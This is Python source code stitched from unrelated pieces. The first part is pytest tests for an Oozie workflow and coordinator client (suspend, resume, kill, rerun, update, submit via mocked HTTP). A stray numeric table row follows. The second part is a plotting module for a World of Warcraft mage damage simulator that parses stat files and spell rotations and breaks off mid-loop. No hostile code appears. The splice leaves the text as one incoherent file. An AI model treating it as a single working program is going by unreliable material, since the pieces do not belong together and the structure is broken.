            with pytest.raises(ValueError) as err:
                api._decode_wf_id(workflow_id=SAMPLE_WF_ID, user='john_doe')
            assert 'User parameter not supported with workflow_id' in str(err)
            result = api._decode_wf_id(workflow_id=SAMPLE_WF_ID)
            assert result == SAMPLE_WF_ID
            # A name is resolved through jobs_last_workflow().
            result = api._decode_wf_id(name='my_workflow')
            assert result == SAMPLE_WF_ID
            mock_last.assert_called_with(name='my_workflow', user=None)
            result = api._decode_wf_id(name='my_workflow', user='john_doe')
            assert result == SAMPLE_WF_ID
            mock_last.assert_called_with(name='my_workflow', user='john_doe')
            mock_last.return_value = None
            with pytest.raises(exceptions.OozieException) as err:
                api._decode_wf_id(name='my_workflow')
            assert "Workflow 'my_workflow' not found" in str(err)

    def test_job_workflow_info(self, api):
        """job_workflow_info() decodes the selector and queries the workflow."""
        with mock.patch.object(api, '_workflow_query') as mock_query:
            with mock.patch.object(api, '_decode_wf_id') as mock_decode:
                mock_decode.return_value = SAMPLE_WF_ID
                api.job_workflow_info(workflow_id=SAMPLE_WF_ID)
                mock_decode.assert_called_with(SAMPLE_WF_ID, None, None)
                mock_query.assert_called_with(SAMPLE_WF_ID)
                api.job_workflow_info(name='my_workflow')
                mock_decode.assert_called_with(None, 'my_workflow', None)
                mock_query.assert_called_with(SAMPLE_WF_ID)
                api.job_workflow_info(name='my_workflow', user='john_doe')
                mock_decode.assert_called_with(None, 'my_workflow', 'john_doe')
                mock_query.assert_called_with(SAMPLE_WF_ID)
class TestOozieClientJobQuery(object):
    """Tests for job_info() / job_action_info() dispatch on the job ID's shape."""

    def test_job_info(self, api):
        """IDs are routed to the coordinator or workflow info method by pattern."""
        with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info:
            with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info:
                api.job_info(SAMPLE_COORD_ID)
                mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
                assert not mock_workflow_info.called
                mock_coord_info.reset_mock()
                api.job_info(SAMPLE_COORD_ACTION)
                mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION)
                assert not mock_workflow_info.called
                mock_coord_info.reset_mock()
                api.job_info(SAMPLE_WF_ID)
                mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
                assert not mock_coord_info.called
                mock_workflow_info.reset_mock()
                api.job_info(SAMPLE_WF_ACTION)
                mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION)
                assert not mock_coord_info.called
                mock_workflow_info.reset_mock()
                # Anything that matches neither pattern is rejected outright.
                with pytest.raises(exceptions.OozieException) as err:
                    api.job_info("wat?")
                assert "'wat?' does not match any known job" in str(err)
                assert not mock_coord_info.called
                assert not mock_workflow_info.called

    def test_job_action_info(self, api):
        """Action IDs additionally select the specific action off the info result."""
        with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info:
            with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info:
                api.job_action_info(SAMPLE_COORD_ID)
                mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
                assert not mock_coord_info.action.called
                assert not mock_workflow_info.called
                mock_coord_info.reset_mock()
                api.job_action_info(SAMPLE_COORD_ACTION)
                mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION)
                mock_coord_info().action.assert_called_with(12)
                assert not mock_workflow_info.called
                mock_coord_info.reset_mock()
                api.job_action_info(SAMPLE_WF_ID)
                mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
                assert not mock_workflow_info.action.called
                assert not mock_coord_info.called
                mock_workflow_info.reset_mock()
                api.job_action_info(SAMPLE_WF_ACTION)
                mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION)
                mock_workflow_info().action.assert_called_with('foo')
                assert not mock_coord_info.called
                mock_workflow_info.reset_mock()
                with pytest.raises(exceptions.OozieException) as err:
                    api.job_action_info("wat?")
                assert "'wat?' does not match any known job" in str(err)
                assert not mock_coord_info.called
                assert not mock_workflow_info.called
class TestOozieClientJobCoordinatorManage(object):
    """Tests for the client's coordinator management operations
    (suspend / resume / kill / rerun / update).

    The ``api`` fixture supplies a client whose HTTP layer is stubbed out;
    the ``sample_coordinator_*`` fixtures supply coordinator and
    coordinator-action objects in the named states.  Each test verifies both
    the state-changing PUT request and the no-op path when the job is
    already in the target state.
    """

    def test_fetch_coordinator_or_action(self, api, sample_coordinator_running, sample_coordinator_action_running):
        """_fetch_coordinator_or_action resolves plain coordinator IDs and action IDs alike."""
        # Plain coordinator id: decoded, looked up, and returned as-is.
        with mock.patch.object(api, '_decode_coord_id') as mock_decode:
            with mock.patch.object(api, 'job_coordinator_info') as mock_info:
                mock_decode.return_value = SAMPLE_COORD_ID
                mock_info.return_value = sample_coordinator_running
                result = api._fetch_coordinator_or_action(SAMPLE_COORD_ID)
                assert result == sample_coordinator_running
                assert mock_decode.called
                assert mock_info.called
        # Action id: the owning coordinator is fetched, but the matching
        # action object is what gets returned.
        with mock.patch.object(api, '_decode_coord_id') as mock_decode:
            with mock.patch.object(api, 'job_coordinator_info') as mock_info:
                mock_decode.return_value = SAMPLE_COORD_ACTION
                mock_info.return_value = sample_coordinator_action_running.coordinator()
                result = api._fetch_coordinator_or_action(SAMPLE_COORD_ACTION)
                assert result == sample_coordinator_action_running
                assert mock_decode.called
                assert mock_info.called

    def test_job_coordinator_suspend_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended):
        """Suspending a running coordinator PUTs ?action=suspend; a suspended one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_running
                assert api.job_coordinator_suspend(SAMPLE_COORD_ID)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend')
                mock_put.reset_mock()
                # Already suspended: returns falsy and makes no HTTP call.
                mock_info.return_value = sample_coordinator_suspended
                assert not api.job_coordinator_suspend(SAMPLE_COORD_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_suspend_coordinator_action(self, api, sample_coordinator_action_running,
                                                        sample_coordinator_action_suspended):
        """Suspending a single action adds type=action&scope=<action number> to the PUT."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_action_running
                assert api.job_coordinator_suspend(SAMPLE_COORD_ACTION)
                # scope=12 is the action number embedded in SAMPLE_COORD_ACTION.
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend&type=action&scope=12')
                mock_put.reset_mock()
                mock_info.return_value = sample_coordinator_action_suspended
                assert not api.job_coordinator_suspend(SAMPLE_COORD_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_resume_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended):
        """Resuming a suspended coordinator PUTs ?action=resume; a running one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_suspended
                assert api.job_coordinator_resume(SAMPLE_COORD_ID)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume')
                mock_put.reset_mock()
                mock_info.return_value = sample_coordinator_running
                assert not api.job_coordinator_resume(SAMPLE_COORD_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_resume_coordinator_action(self, api, sample_coordinator_action_running,
                                                       sample_coordinator_action_suspended):
        """Resuming a single suspended action adds type=action&scope=<n> to the PUT."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_action_suspended
                assert api.job_coordinator_resume(SAMPLE_COORD_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume&type=action&scope=12')
                mock_put.reset_mock()
                mock_info.return_value = sample_coordinator_action_running
                assert not api.job_coordinator_resume(SAMPLE_COORD_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_kill_coordinator(self, api, sample_coordinator_running, sample_coordinator_killed):
        """Killing a running coordinator PUTs ?action=kill; a killed one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_running
                assert api.job_coordinator_kill(SAMPLE_COORD_ID)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill')
                mock_put.reset_mock()
                mock_info.return_value = sample_coordinator_killed
                assert not api.job_coordinator_kill(SAMPLE_COORD_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_kill_coordinator_action(self, api, sample_coordinator_action_running,
                                                     sample_coordinator_action_killed):
        """Killing a single action adds type=action&scope=<n> to the PUT."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_action_running
                assert api.job_coordinator_kill(SAMPLE_COORD_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill&type=action&scope=12')
                mock_put.reset_mock()
                mock_info.return_value = sample_coordinator_action_killed
                assert not api.job_coordinator_kill(SAMPLE_COORD_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_rerun(self, api, sample_coordinator_action_running,
                                   sample_coordinator_action_killed,
                                   sample_coordinator_action_killed_with_killed_coordinator):
        """Rerun only fires for a killed action whose coordinator is still alive."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_action_info') as mock_info:
                mock_info.return_value = sample_coordinator_action_killed
                assert api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID +
                                            '?action=coord-rerun&type=action&scope=12&refresh=true')
                mock_put.reset_mock()
                # Killed action but the coordinator itself is killed: no rerun.
                mock_info.return_value = sample_coordinator_action_killed_with_killed_coordinator
                assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()
                # Action still running: nothing to rerun.
                mock_info.return_value = sample_coordinator_action_running
                assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_coordinator_rerun_only_supports_actions(self, api, sample_coordinator_running):
        """Passing a bare coordinator id (no action number) to rerun raises ValueError."""
        with mock.patch.object(api, 'job_action_info') as mock_info:
            mock_info.return_value = sample_coordinator_running
            with pytest.raises(ValueError) as value_error:
                api.job_coordinator_rerun(SAMPLE_COORD_ID)
            assert str(value_error.value) == 'Rerun only supports coordinator action IDs'

    def test_job_coordinator_update(self, api, sample_coordinator_running, sample_coordinator_killed):
        """Update PUTs the submission XML and returns the refreshed coordinator.

        Covers: an empty diff, a real diff, an inactive (killed) coordinator,
        and a server response without an 'update' payload.
        """
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_coordinator_info') as mock_info:
                # Empty diff still counts as a successful update.
                mock_info.return_value = sample_coordinator_running
                mock_put.return_value = {'update': {'diff': "****Empty Diff****"}}
                coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-minimal')
                conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-minimal')
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf)
                mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
                assert coord is sample_coordinator_running
                mock_put.reset_mock()
                mock_info.reset_mock()
                # Non-empty diff: same call shape, refreshed coordinator returned.
                mock_info.return_value = sample_coordinator_running
                mock_put.return_value = {'update': {'diff': "*****Diffs*****"}}
                coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
                conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-full')
                mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf)
                mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
                assert coord is sample_coordinator_running
                mock_put.reset_mock()
                mock_info.reset_mock()
                # Inactive coordinator: update refused.
                mock_info.return_value = sample_coordinator_killed
                with pytest.raises(exceptions.OozieException) as err:
                    api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
                assert 'coordinator status must be active in order to update' in str(err)
                # Server response missing the 'update' payload: operation failed.
                mock_info.return_value = sample_coordinator_running
                mock_put.return_value = {}
                with pytest.raises(exceptions.OozieException) as err:
                    api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
                assert 'update coordinator' in str(err)
class TestOozieClientJobWorkflowManage(object):
    """Tests for workflow management operations (suspend / resume / start).

    Unlike coordinator actions, a workflow *action* id resolves to its owning
    workflow: the PUT always targets the workflow id with no scope parameter.
    Each test also checks the no-op path when the workflow is already in the
    target state.
    """

    def test_job_workflow_suspend_workflow(self, api, sample_workflow_running, sample_workflow_suspended):
        """Suspending a running workflow PUTs ?action=suspend; a suspended one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_running
                assert api.job_workflow_suspend(SAMPLE_WF_ID)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_suspended
                assert not api.job_workflow_suspend(SAMPLE_WF_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_workflow_suspend_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended):
        """A workflow action id suspends the whole owning workflow (no scope in the PUT)."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_running
                assert api.job_workflow_suspend(SAMPLE_WF_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_suspended
                assert not api.job_workflow_suspend(SAMPLE_WF_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_workflow_resume_workflow(self, api, sample_workflow_running, sample_workflow_suspended):
        """Resuming a suspended workflow PUTs ?action=resume; a running one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_suspended
                assert api.job_workflow_resume(SAMPLE_WF_ID)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_running
                assert not api.job_workflow_resume(SAMPLE_WF_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_workflow_resume_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended):
        """A workflow action id resumes the whole owning workflow."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_suspended
                assert api.job_workflow_resume(SAMPLE_WF_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_running
                assert not api.job_workflow_resume(SAMPLE_WF_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_workflow_start_workflow(self, api, sample_workflow_running, sample_workflow_prep):
        """Starting a PREP workflow PUTs ?action=start; an already-running one is a no-op."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_prep
                assert api.job_workflow_start(SAMPLE_WF_ID)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_running
                assert not api.job_workflow_start(SAMPLE_WF_ID)
                assert not mock_put.called
                mock_put.reset_mock()

    def test_job_workflow_start_workflow_action(self, api, sample_workflow_running, sample_workflow_prep):
        """A workflow action id starts the whole owning workflow."""
        with mock.patch.object(api, '_put') as mock_put:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_prep
                assert api.job_workflow_start(SAMPLE_WF_ACTION)
                mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start')
                mock_put.reset_mock()
                mock_info.return_value = sample_workflow_running
                assert not api.job_workflow_start(SAMPLE_WF_ACTION)
                assert not mock_put.called
                mock_put.reset_mock()
class TestOozieClientJobSubmit(object):
    """Tests for coordinator / workflow submission via POST to 'jobs'.

    Verifies the failure path when the server returns no job id, the happy
    path returning the freshly-fetched job object, and the content of the
    generated submission XML (application path, user name, extra properties).
    """

    def test_jobs_submit_coordinator(self, api, sample_coordinator_running):
        """Coordinator submission: no id in the response raises; otherwise the coordinator is fetched and returned."""
        with mock.patch.object(api, '_post') as mock_post:
            with mock.patch.object(api, 'job_coordinator_info') as mock_info:
                mock_info.return_value = sample_coordinator_running
                # Server returned no payload: submission must fail loudly.
                mock_post.return_value = None
                with pytest.raises(exceptions.OozieException) as err:
                    api.jobs_submit_coordinator('/dummy/coord-path')
                assert 'Operation failed: submit coordinator' in str(err)
                mock_post.assert_called_with('jobs', mock.ANY)
                mock_post.reset_mock()
                # Successful submission returns the coordinator looked up by the new id.
                mock_post.return_value = {'id': SAMPLE_COORD_ID}
                coord = api.jobs_submit_coordinator('/dummy/coord-path')
                mock_post.assert_called_with('jobs', mock.ANY)
                mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
                assert coord is sample_coordinator_running
                mock_post.reset_mock()

    def test_jobs_submit_coordinator_config(self, api, sample_coordinator_running):
        """The posted XML carries the coordinator path, the user name, and any extra configuration."""
        with mock.patch.object(api, '_post') as mock_post:
            with mock.patch.object(api, 'job_coordinator_info') as mock_info:
                mock_info.return_value = sample_coordinator_running
                mock_post.return_value = {'id': SAMPLE_COORD_ID}
                api.jobs_submit_coordinator('/dummy/coord-path')
                # The second positional argument of _post is the UTF-8 encoded XML body.
                conf = mock_post.call_args[0][1].decode('utf-8')
                assert '<name>oozie.coord.application.path</name><value>/dummy/coord-path</value>' in conf
                assert '<name>user.name</name><value>oozie</value>' in conf
                mock_post.reset_mock()
                # Caller-supplied configuration properties are merged into the XML.
                api.jobs_submit_coordinator('/dummy/coord-path', configuration={'test.prop': 'this is a test'})
                conf = mock_post.call_args[0][1].decode('utf-8')
                assert '<name>test.prop</name><value>this is a test</value>' in conf
                mock_post.reset_mock()

    def test_jobs_submit_workflow(self, api, sample_workflow_running):
        """Workflow submission: failure path, start=True (?action=start), and plain submit."""
        with mock.patch.object(api, '_post') as mock_post:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_running
                # No payload from the server: submission fails.
                mock_post.return_value = None
                with pytest.raises(exceptions.OozieException) as err:
                    api.jobs_submit_workflow('/dummy/wf-path')
                assert 'Operation failed: submit workflow' in str(err)
                mock_post.assert_called_with('jobs', mock.ANY)
                mock_post.reset_mock()
                # start=True posts to 'jobs?action=start' so the workflow runs immediately.
                mock_post.return_value = {'id': SAMPLE_WF_ID}
                wf = api.jobs_submit_workflow('/dummy/wf-path', start=True)
                mock_post.assert_called_with('jobs?action=start', mock.ANY)
                assert wf is sample_workflow_running
                mock_post.reset_mock()
                # Default submit leaves the workflow in PREP and fetches it by id.
                mock_post.return_value = {'id': SAMPLE_WF_ID}
                wf = api.jobs_submit_workflow('/dummy/wf-path')
                mock_post.assert_called_with('jobs', mock.ANY)
                mock_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
                assert wf is sample_workflow_running
                mock_post.reset_mock()

    def test_jobs_submit_workflow_config(self, api, sample_workflow_running):
        """The posted XML carries the workflow path, the user name, and any extra configuration."""
        with mock.patch.object(api, '_post') as mock_post:
            with mock.patch.object(api, 'job_workflow_info') as mock_info:
                mock_info.return_value = sample_workflow_running
                mock_post.return_value = {'id': SAMPLE_WF_ID}
                api.jobs_submit_workflow('/dummy/wf-path')
                conf = mock_post.call_args[0][1].decode('utf-8')
                assert '<name>oozie.wf.application.path</name><value>/dummy/wf-path</value>' in conf
                assert '<name>user.name</name><value>oozie</value>' in conf
                mock_post.reset_mock()
                api.jobs_submit_workflow('/dummy/wf-path', configuration={'test.prop': 'this is a test'})
                conf = mock_post.call_args[0][1].decode('utf-8')
                assert '<name>test.prop</name><value>this is a test</value>' in conf
                mock_post.reset_mock()
| 66,946 | 21,463 |
import fns
import numpy as np
import sys
def eprint(*args, **kwargs):
    """Drop-in replacement for print() that writes to standard error."""
    print(*args, **kwargs, file=sys.stderr)
from .libs import tbc_mage_backend as bck
import importlib
importlib.reload(bck)
def read_stat_file(location, file, stats):
    """Read character stats from a stats file referenced by a mage file.

    The stats file is resolved relative to the mage file: the final path
    component of *location* is replaced by *file* ('/'-separated paths).
    Each line is ``key value``; ``#`` starts a comment.  Recognized stat
    keys are parsed as floats and written into *stats*, which is mutated
    in place; unknown keys are silently ignored, and a duplicated key
    keeps its last value.

    :param location: path of the referencing mage file
    :param file: stats file name, relative to the mage file's directory
    :param stats: dict to fill with ``{stat_name: float_value}``
    """
    # The original had one copy-pasted `if` per stat; a membership test on
    # this tuple is equivalent and keeps the key list in one place.
    known_stats = ('intellect', 'spirit', 'common_spell_damage', 'crit_rating',
                   'hit_rating', 'mp5', 'fire_damage', 'frost_damage',
                   'arcane_damage', 'haste_rating')
    loc = '/'.join(location.split('/')[:-1]) + '/' + file
    with open(loc) as f:
        for line in f:
            # Strip trailing comments before tokenizing; a full-comment line
            # becomes empty and fails the length check below.
            if '#' in line:
                line = line.split('#')[0]
            sp = line.split()
            if len(sp) > 1 and sp[0] in known_stats:
                stats[sp[0]] = float(sp[1])
class mage_file:
    """Parsed representation of one mage configuration file.

    The file is a line-based ``key value`` format where ``#`` starts a
    comment.  After parsing, the instance exposes:

    * ``stats``    -- dict of numeric character stats (floats)
    * ``talents``  -- talent dict from ``bck.make_talents()``, with any
      matching keys in the file overriding the defaults (ints)
    * ``burn_rot`` / ``save_rot`` -- raw spell-name lists from the
      ``burn_rotation:`` / ``save_rotation:`` lines
    * ``label``    -- plot label (``label`` key), defaults to 'no label'
    * ``color``    -- RGBA list; only set when a ``color`` line is present
      (callers check with hasattr and fall back to a palette otherwise)
    """
    def __init__(self,location):
        self.location= location
        self.label = 'no label'
        self.stats = {}
        self.talents = bck.make_talents()
        self.burn_rot = []
        self.save_rot = []
        with open(location) as f:
            for line in f:
                # Strip trailing comments before tokenizing.
                if '#' in line:
                    line = line.split('#')[0]
                sp = line.split()
                if len(sp)>1:
                    if not sp[0][0] == '#':
                        # 'stats_file' pulls additional stats from a sibling
                        # file (resolved relative to this file's directory).
                        if sp[0] == 'stats_file':
                            read_stat_file(location, sp[1], self.stats)
                        # Inline stat values; these mirror the keys that
                        # read_stat_file recognizes and may override them.
                        if sp[0] == 'intellect':
                            self.stats['intellect'] = float(sp[1].strip())
                        if sp[0] == 'spirit':
                            self.stats['spirit'] = float(sp[1].strip())
                        if sp[0] == 'common_spell_damage':
                            self.stats['common_spell_damage'] = float(sp[1].strip())
                        if sp[0] == 'crit_rating':
                            self.stats['crit_rating'] = float(sp[1].strip())
                        if sp[0] == 'hit_rating':
                            self.stats['hit_rating'] = float(sp[1].strip())
                        if sp[0] == 'mp5':
                            self.stats['mp5'] = float(sp[1].strip())
                        if sp[0] == 'fire_damage':
                            self.stats['fire_damage'] = float(sp[1].strip())
                        if sp[0] == 'frost_damage':
                            self.stats['frost_damage'] = float(sp[1].strip())
                        if sp[0] == 'arcane_damage':
                            self.stats['arcane_damage'] = float(sp[1].strip())
                        if sp[0] == 'haste_rating':
                            self.stats['haste_rating'] = float(sp[1].strip())
                        # Any key matching a talent name overrides its rank.
                        for talent in self.talents:
                            if sp[0] == talent:
                                self.talents[talent] = int(sp[1].strip())
                        # Rotations: every remaining token on the line is a
                        # spell name, in cast order.
                        if sp[0] == 'burn_rotation:':
                            for i in range(1,len(sp)):
                                self.burn_rot.append(sp[i])
                        if sp[0] == 'save_rotation:':
                            for i in range(1,len(sp)):
                                self.save_rot.append(sp[i])
                        if sp[0] == 'label':
                            self.label = ' '.join(sp[1:])
                        # 'color r g b' -- alpha is fixed at 1.
                        if sp[0] == 'color':
                            self.color = [0,0,0,1]
                            self.color[0] = float(sp[1])
                            self.color[1] = float(sp[2])
                            self.color[2] = float(sp[3])
def parse_rot(rot):
    """Translate a rotation's user-facing spell names into backend spell names.

    'fireball' and 'scorch' are specialized by how many of the following
    casts can re-roll the ignite (0, 1 or 2; the rotation is treated as
    cyclic), all other known spells map one-to-one.  Unknown spell names
    are reported on stdout and dropped from the result.

    :param rot: list of spell names as written in the rotation file
    :return: list of backend spell identifiers
    """
    # One-to-one renames for spells that need no ignite-roll analysis.
    direct = {
        'fireblast': 'fireblast',
        'arcane_missiles': 'arcane_missiles_10',
        'frostbolt': 'frostbolt_13',
        'arcane_blast_0speed_0mana': 'arcane_blast_1_0speed_0mana',
        'arcane_blast_1speed_1mana': 'arcane_blast_1_1speed_1mana',
        'arcane_blast_2speed_2mana': 'arcane_blast_1_2speed_2mana',
        'arcane_blast_3speed_3mana': 'arcane_blast_1_3speed_3mana',
        'arcane_blast_1speed_0mana': 'arcane_blast_1_1speed_0mana',
        'arcane_blast_2speed_0mana': 'arcane_blast_1_2speed_0mana',
        'arcane_blast_3speed_0mana': 'arcane_blast_1_3speed_0mana',
    }
    # Backend names indexed by the number of follow-up ignite rolls (0-2).
    fireball_by_rolls = ('fireball_13_one_tick_no_roll',
                         'fireball_13_one_tick_one_roll',
                         'fireball_13_one_tick')
    scorch_by_rolls = ('scorch_9_no_roll', 'scorch_9_one_roll', 'scorch_9')
    l = len(rot)

    def ignite_rolls(i):
        """Count (0-2) the upcoming casts that can keep the ignite rolling.

        A following fireball, or a pair of scorches, counts as one roll; the
        same check is then applied once more to the cast(s) after that.  This
        logic was duplicated verbatim in the fireball and scorch branches of
        the original.
        """
        rolls = 0
        if rot[(i + 1) % l] == 'fireball':
            rolls += 1
            if rot[(i + 2) % l] == 'fireball':
                rolls += 1
            elif rot[(i + 2) % l] == 'scorch' and rot[(i + 3) % l] == 'scorch':
                rolls += 1
        elif rot[(i + 1) % l] == 'scorch' and rot[(i + 2) % l] == 'scorch':
            rolls += 1
            if rot[(i + 3) % l] == 'fireball':
                rolls += 1
            elif rot[(i + 3) % l] == 'scorch' and rot[(i + 4) % l] == 'scorch':
                rolls += 1
        return rolls

    new_rot = []
    for i, spell in enumerate(rot):
        if spell == 'fireball':
            new_rot.append(fireball_by_rolls[ignite_rolls(i)])
        elif spell == 'scorch':
            # Bug fix: the original also appended an unconditional extra
            # 'scorch_9' after the roll-specific name, so every scorch was
            # emitted twice; the fireball branch had no such line, treated
            # as a leftover from before the roll-count split.
            new_rot.append(scorch_by_rolls[ignite_rolls(i)])
        elif spell in direct:
            new_rot.append(direct[spell])
        else:
            # Unknown spell: tell the user what is supported and skip it.
            print('spell ' + spell + ' not found, possible spells are:')
            pos_spells = ['fireball_13_one_tick',
                          'fireball',
                          'scorch',
                          'fireblast',
                          #'pyroblast',
                          #'pom_pyroblast',
                          'arcane_missiles',
                          'arcane_blast_0speed_0mana',
                          'arcane_blast_1speed_1mana',
                          'arcane_blast_2speed_2mana',
                          'arcane_blast_3speed_3mana',
                          'arcane_blast_1speed_0mana',
                          'arcane_blast_2speed_0mana',
                          'arcane_blast_3speed_0mana',
                          'frostbolt',
                          ]
            for name in pos_spells:
                print(name)
    return new_rot
class moduleClass:
    """Plotting module for 'mage' files.

    Loads every selected mage config, applies the UI's buff cases and
    talent/cooldown toggles, and renders whichever plots are enabled in the
    UI (damage, dps, buff-state comparison, mage comparison, per-spell
    dps/dpm, stat weights).  When ui['save_check'] is set, each plot is also
    rendered on the frame's hidden figure and saved to
    ui['save_filename']/<name>.{svg,png}.
    """
    # File extensions this module handles.
    filetypes=['mage']
    def __init__ (self, fig, locations, frame, ui):
        self.fig=fig
        self.frame=frame
        self.locations=locations
        self.ui=ui
    def run(self):
        """Load inputs and build all selected plots."""
        # Create the output directory up front; best-effort (errors such as
        # "already exists" are deliberately ignored).
        if self.ui['save_check']:
            try:
                import os
                os.makedirs(self.ui['save_filename'])
            except:
                None
        ui=self.ui
        fig=self.fig
        #prepare figure
        fig.clear()
        #load mages
        # Default RGBA colors, cycled for mage files that set no 'color'.
        mage_colors = [[0.5,0,1,1],
                       [1,0.5,0,1],
                       [0.2,0.2,1,1],
                       [0,0,0,1],
                       [0.5,0,1,1],
                       [1,1,0,1],
                       [0.2,1,1,1],
                       [0,1,0,1],
                       ]
        self.mages=[]
        for i, location in enumerate(self.locations):
            self.mages.append(mage_file(location))
            # Named "optimized" rotations are resolved by the backend itself;
            # anything else is translated spell-by-spell via parse_rot().
            if self.mages[-1].save_rot[0] == 'arcane_frost_clearcasting_optimized':
                None
            elif self.mages[-1].save_rot[0] == 'fireball_spam_clearcasting_optimized':
                None
            elif self.mages[-1].save_rot[0] == 'frostbolt_spam_clearcasting_optimized':
                None
            elif self.mages[-1].save_rot[0] == 'scorch_spam_clearcasting_optimized':
                None
            else:
                self.mages[-1].save_rot = parse_rot(self.mages[-1].save_rot)
            # 'None' disables the burn rotation entirely.
            if self.mages[-1].burn_rot[0] == 'None':
                None
            elif self.mages[-1].burn_rot[0] == 'AB_spam_clearcasting_optimized':
                None
            else:
                self.mages[-1].burn_rot = parse_rot(self.mages[-1].burn_rot)
            if not hasattr(self.mages[-1],'color'):
                self.mages[-1].color = mage_colors[i%8]
            # Global UI toggles override the per-file talent settings.
            for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']:
